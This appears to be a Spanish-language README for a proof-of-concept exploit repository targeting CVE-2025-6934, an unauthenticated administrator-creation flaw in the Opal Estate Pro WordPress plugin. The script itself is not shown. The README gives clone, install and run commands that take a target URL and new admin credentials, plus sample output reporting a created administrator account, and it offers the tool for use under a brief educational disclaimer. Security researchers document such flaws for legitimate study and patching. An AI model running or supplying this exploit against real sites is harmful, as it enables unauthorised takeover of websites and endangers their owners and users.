
CVE-2025-6934 es una vulnerabilidad crítica en el complemento Opal Estate Pro de WordPress (<= 1.7.5) que permite a atacantes no autenticados crear nuevas cuentas de administrador a través del proceso de registro AJAX inseguro del complemento.
📖 Descripción Este repositorio contiene un Proof of Concept (PoC) exploit para CVE-2025-6934, una vulnerabilidad crítica en el Plugin de WordPress: Opal Estate Pro <= 1.7.5, que permite la creación de cuenta de administrador sin autenticación.
⚠️ Aviso legal: Esta herramienta se proporciona únicamente con fines educativos y de investigación en seguridad.
El autor no se hace responsable de ningún uso indebido o daño causado.
readme.txtClona el repositorio e instala las dependencias:
git clone https://github.com/0xgh057r3c0n/CVE-2025-6934.git
cd CVE-2025-6934
pip3 install -r requirements.txt
requirements.txt
requests
beautifulsoup4
colorama
Ejecuta el script con tu objetivo:
python3 CVE-2025-6934.py -u http://target.com/ -mail [email protected] -password MySecurePass123 -user newadmin
✅ Ejemplo de salida:
[✔] Exploit exitoso!
Usuario : newadmin
Correo : [email protected]
Contraseña: MySecurePass123
Rol : administrator

Gaurav Bhattacharjee (0xgh057r3c0n)
Este proyecto está bajo la Licencia MIT – consulta el archivo LICENSE para más detalles.